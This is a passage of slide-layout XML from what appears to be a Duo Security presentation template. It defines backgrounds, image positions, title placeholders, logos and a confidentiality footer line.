        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 422"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="423" name="Google Shape;423;p63"/>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424" name="Google Shape;424;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-721262" y="3665250"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="425" name="Google Shape;425;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3346438" y="-774425"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="426" name="Google Shape;426;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-573750" y="-1070300"/>
            <a:ext cx="3747000" cy="3747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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6524225" y="3541155"/>
            <a:ext cx="1031100" cy="10311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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6966991" y="2676700"/>
            <a:ext cx="1693500" cy="16935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430" name="Google Shape;430;p63"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050375" y="4700875"/>
            <a:ext cx="984229" cy="1777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7 - Graphics (navy abstract 3)">
  <p:cSld name="CUSTOM_10_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 431"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="432" name="Google Shape;432;p64"/>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433" name="Google Shape;433;p64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2108500" y="2549375"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="434" name="Google Shape;434;p64"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="612050" y="-449600"/>
            <a:ext cx="3423000" cy="3423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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4548725" y="-2572112"/>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4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-201700" y="1329517"/>
            <a:ext cx="1906500" cy="19065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438" name="Google Shape;438;p64"/>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D8 - Graphics (navy abstract 4)">
  <p:cSld name="CUSTOM_10_1_1_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 439"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="440" name="Google Shape;440;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-285900" y="3935250"/>
            <a:ext cx="2894400" cy="28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1" name="Google Shape;441;p65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5201438" y="-429925"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="442" name="Google Shape;442;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4667386" y="2840086"/>
            <a:ext cx="3330300" cy="33303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5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4146412" y="1814888"/>
            <a:ext cx="1743300" cy="17433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65"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-2674687" y="469675"/>
            <a:ext cx="6707124" cy="3155249"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="445" name="Google Shape;445;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-5400000">
            <a:off x="-3792426" y="-3359276"/>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446" name="Google Shape;446;p65"/>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447" name="Google Shape;447;p65"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7911425" y="4878650"/>
            <a:ext cx="123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448" name="Google Shape;448;p65"/>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1">
  <p:cSld name="TITLE_2_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 449"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="450" name="Google Shape;450;p66"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="52" r="25515" b="23377"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-40000" y="-40700"/>
            <a:ext cx="9281976" cy="5373599"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="451" name="Google Shape;451;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="797050"/>
            <a:ext cx="5039700" cy="2442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2" name="Google Shape;452;p66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="3239050"/>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3F44"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="363F4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3" name="Google Shape;453;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pic>
        <p:nvPicPr>
          <p:cNvPr id="454" name="Google Shape;454;p66" descr="Duo Logo White@2x.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="384681" y="4327931"/>
            <a:ext cx="1513500" cy="490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1 - Title (computer)" type="title">
  <p:cSld name="TITLE">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 458"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="Google Shape;459;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271800" y="442100"/>
            <a:ext cx="4860300" cy="2368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0" name="Google Shape;460;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="2838325"/>
            <a:ext cx="3121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61" name="Google Shape;461;p68" descr="duo green mark.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="397825" y="4163475"/>
            <a:ext cx="1533925" cy="499750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="462" name="Google Shape;462;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="-837602">
            <a:off x="3837495" y="-627447"/>
            <a:ext cx="7019338" cy="7522544"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="463" name="Google Shape;463;p68"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="4878650"/>
            <a:ext cx="88500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64" name="Google Shape;464;p68"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192000" y="4424674"/>
            <a:ext cx="1320700" cy="23855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2 - Title (plain navy)">
  <p:cSld name="TITLE_2_1">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="363F44"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 465"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Google Shape;466;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="797050"/>
            <a:ext cx="5039700" cy="2442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7" name="Google Shape;467;p69"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="294075" y="3239050"/>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68" name="Google Shape;468;p69" descr="Duo Logo White@2x.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="384681" y="4327931"/>
            <a:ext cx="1513500" cy="490375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="469" name="Google Shape;469;p6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470" name="Google Shape;470;p69"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2192000" y="4579749"/>
            <a:ext cx="1320700" cy="238551"/>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3 - Title (right side)">
  <p:cSld name="TITLE_1_1_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 471"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="472" name="Google Shape;472;p70"/>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473" name="Google Shape;473;p70" descr="kendra_windows-laptop_microsoft-phone.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="31478"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="404800" y="671675"/>
            <a:ext cx="3623400" cy="3685200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="474" name="Google Shape;474;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603500" y="519275"/>
            <a:ext cx="4311900" cy="1857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5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70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4603500" y="3393038"/>
            <a:ext cx="3794100" cy="1485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76" name="Google Shape;476;p7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77" name="Google Shape;477;p70"/>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X1 - Title (DLT)">
  <p:cSld name="CUSTOM_2">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 478"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="479" name="Google Shape;479;p71" descr="DLT_lockup_gr-02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1085175" y="1877525"/>
            <a:ext cx="6973653" cy="1388450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="480" name="Google Shape;480;p7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X4 - Body (Tech Talks)">
  <p:cSld name="CUSTOM_3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 name="Google Shape;41;p8" descr="DTT_lockup-01.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="248975" y="4502050"/>
            <a:ext cx="1443306" cy="361000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p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3" name="Google Shape;43;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824450" y="4612713"/>
            <a:ext cx="984229" cy="1777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X2 - Body (DLT)">
  <p:cSld name="CUSTOM_3">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 481"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="482" name="Google Shape;482;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3" name="Google Shape;483;p72" descr="DLT_lockup.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="4551503"/>
            <a:ext cx="1747975" cy="300200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="484" name="Google Shape;484;p7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85" name="Google Shape;485;p72"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2225400" y="4612713"/>
            <a:ext cx="984229" cy="1777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X3 - Title (Tech Talks)">
  <p:cSld name="CUSTOM_4">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:srgbClr val="6BBF4E"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 486"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="487" name="Google Shape;487;p73" descr="DTT_lockup_gr-02.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="984625" y="1832825"/>
            <a:ext cx="5729575" cy="1433150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;p7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X4 - Body (Tech Talks)">
  <p:cSld name="CUSTOM_3_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 489"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="490" name="Google Shape;490;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1" name="Google Shape;491;p74" descr="DTT_lockup-01.png"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="248975" y="4502050"/>
            <a:ext cx="1443306" cy="361000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="492" name="Google Shape;492;p7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93" name="Google Shape;493;p74"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1824450" y="4612713"/>
            <a:ext cx="984229" cy="1777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4 - Title (left side)">
  <p:cSld name="TITLE_1">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 494"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="495" name="Google Shape;495;p75" descr="kendra_windows-laptop_microsoft-phone.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="31478"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599505" y="0"/>
            <a:ext cx="5057100" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="496" name="Google Shape;496;p75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="287600" y="523250"/>
            <a:ext cx="4311900" cy="1857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5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75"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305650" y="3353123"/>
            <a:ext cx="3794100" cy="1252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pic>
        <p:nvPicPr>
          <p:cNvPr id="498" name="Google Shape;498;p75"/>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499" name="Google Shape;499;p7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363F44"/>
                </a:solidFill>
                <a:latin typeface="Helvetica Neue"/>
                <a:ea typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
                <a:sym typeface="Helvetica Neue"/>
              </a:rPr>
              <a:t>CONFIDENTIAL INFORMATION PROPERTY OF DUO SECURITY, INC.</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:solidFill>
                <a:srgbClr val="363F44"/>
              </a:solidFill>
              <a:latin typeface="Helvetica Neue"/>
              <a:ea typeface="Helvetica Neue"/>
              <a:cs typeface="Helvetica Neue"/>
              <a:sym typeface="Helvetica Neue"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="500" name="Google Shape;500;p75"/>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F1 - Body with bullets" type="secHead">
  <p:cSld name="SECTION_HEADER">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 501"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
